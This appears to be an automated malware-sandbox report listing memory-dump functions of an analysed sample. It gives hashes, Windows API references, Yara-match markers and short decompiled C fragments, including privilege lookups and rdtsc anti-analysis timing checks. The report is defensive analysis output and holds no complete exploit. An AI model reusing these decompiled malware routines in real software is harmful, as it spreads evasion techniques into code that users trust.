Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 0087FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FADB

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 0087FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FAF3

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 0087FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FBC3

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 0087FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FB73

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 0087FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FC9B

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 0087FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FC6B

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 0087FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FD9A

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 0087FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FDCB

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 0087FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FEAB

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 0087FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FEDB

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 008807AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008807B7

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 0087FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087FFBF

Memory Dump Source

Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 004088C0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088C0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0C0( &_v284, 0x104);
						E0041A730( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DE0(E00413D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1b5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088cb
0x004088d3
0x004088d5
0x004088da
0x004088df
0x004088f2
0x004088f7
0x00408900
0x0040890c
0x0040891f
0x00408924
0x00408927
0x00408930
0x00408942
0x00408947
0x0040894c
0x00000000
0x00000000
0x0040894e
0x00408952
0x00000000
0x00000000
0x00408954
0x00000000
0x00408952
0x00408956
0x00408959
0x0040895f
0x00408961
0x0040896c
0x00408971
0x00408974
0x00408981
0x0040898c
0x0040898e
0x00408994
0x00408998
0x0040899b
0x0040899b
0x004089a2
0x004089a5
0x004089aa
0x004089b7
0x004088e6
0x004088e6
0x004088e6

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 299515b6a4c4b7fe34a0254a828e2e35bbff23895406936d62d23753fc4f2dc5
Instruction ID: 2d85129770ae1569db338c81f9331519a7dd6e0895954f6df8c699ab0d1d1ce1
Opcode Fuzzy Hash: 299515b6a4c4b7fe34a0254a828e2e35bbff23895406936d62d23753fc4f2dc5
Instruction Fuzzy Hash: C5212BB2C442085BCB11E6609D42BFF736C9B14304F04017FE989A3181FA38AB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 00418880, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418880(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191B0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x00418897
0x004188a2
0x004188ad
0x004188b1

APIs

RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188AD

Strings

&5A, xrefs: 004188A2, 004188AC

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: &5A
API String ID: 1279760036-1617645808
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 4ef14f879dafae0d6951d5bd0a6bbd37283b7ec5dd2ccf2ca50cdce3f5cd3bdb
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 6CE012B1200208ABDB14EF99CC45EA777ADAF88654F158559FA095B242CA30F910CAF4

Uniqueness

Uniqueness Score: -1.00%

Function 004188B2, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 004188ED
ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418928

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitFreeHeapProcess
String ID:
API String ID: 1180424539-0
Opcode ID: 712053724ce6fde3dda3dc2c9ff3630cdedbb5a685f270781d41f3608182f818
Instruction ID: e2a99679b142890d3171876c2147a3a0cbfe3255010accf2b4f8d621d631af7b
Opcode Fuzzy Hash: 712053724ce6fde3dda3dc2c9ff3630cdedbb5a685f270781d41f3608182f818
Instruction Fuzzy Hash: 3BF0F0B0200200BFC710DF69CC88EE73BA9EF88320F04864AF9089B312C630E900CAF4

Uniqueness

Uniqueness Score: -1.00%

Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A110( &_v67, 0, 0x3f);
				E0041ACF0( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407280
0x0040728f
0x00407293
0x0040729e
0x004072ae
0x004072be
0x004072c3
0x004072ca
0x004072cd
0x004072da
0x004072dc
0x004072de
0x004072fb
0x004072fb
0x00000000
0x004072fd
0x00407302

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 14624e8db26b89bccf1705d7108d041dc2e52ca21b332cab295bc8e658a3c696
Instruction ID: 7737b7532069fc333edaf9b0832c3edc759e3be1fb1c5433828103526b109584
Opcode Fuzzy Hash: 14624e8db26b89bccf1705d7108d041dc2e52ca21b332cab295bc8e658a3c696
Instruction Fuzzy Hash: 36018431A8022876E721A6959C03FFE776C5B00B55F15416EFF04BA1C2E6A87A0546EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418A13, Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00418A13(void* __eax, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				signed int _t8;
				int _t13;
				intOrPtr* _t14;
				void* _t17;
				void* _t20;

				_t8 = __eax - 1;
				if(_t8 > 0) {
					L4:
					return  *_t14(_t8, _t17);
				} else {
					_t8 = _t8 | 0xccd37f06;
					if(_t8 != 0) {
						goto L4;
					} else {
						 *0x8b5535d4 = _t8;
						_t10 = _a4;
						E004191B0(_t20, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
						_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
						return _t13;
					}
				}
			}

0x00418a13
0x00418a14
0x00418a8a
0x00418a90
0x00418a16
0x00418a16
0x00418a1b
0x00000000
0x00418a1d
0x00418a1d
0x00418a23
0x00418a3a
0x00418a50
0x00418a54
0x00418a54
0x00418a1b

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A50

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 7b3da62df12b4d5133d59b8203d34cc138ae05f8eed264418d76068305e845be
Instruction ID: ccd63faf6446371bab5f84ecb0f24a74787d440f44f0fba3bef8737164e9a278
Opcode Fuzzy Hash: 7b3da62df12b4d5133d59b8203d34cc138ae05f8eed264418d76068305e845be
Instruction Fuzzy Hash: 2EF082B26402046FDB10DF55DC44EE73769EF85350F04845AF90D97300D935E8508BB4

Uniqueness

Uniqueness Score: -1.00%

Function 004188C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 004188ED

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 8f9b7065ee004bfc107c5e1a3206d22b1dba8f53d1ba42c3d4a522b3320012f0
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: C0E012B1200208ABDB18EF99CC49EA777ADAF88750F018559FA095B242CA30E910CAF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418A20, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418A20(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191B0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418a3a
0x00418a50
0x00418a54

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A50

Memory Dump Source

Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 62f155a2f2b834774e03dd9f5cc664d450e5ddbb18d5cf86998e13752e76a9ec
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 6EE01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0957241CA34E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418900, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418928

Memory Dump Source

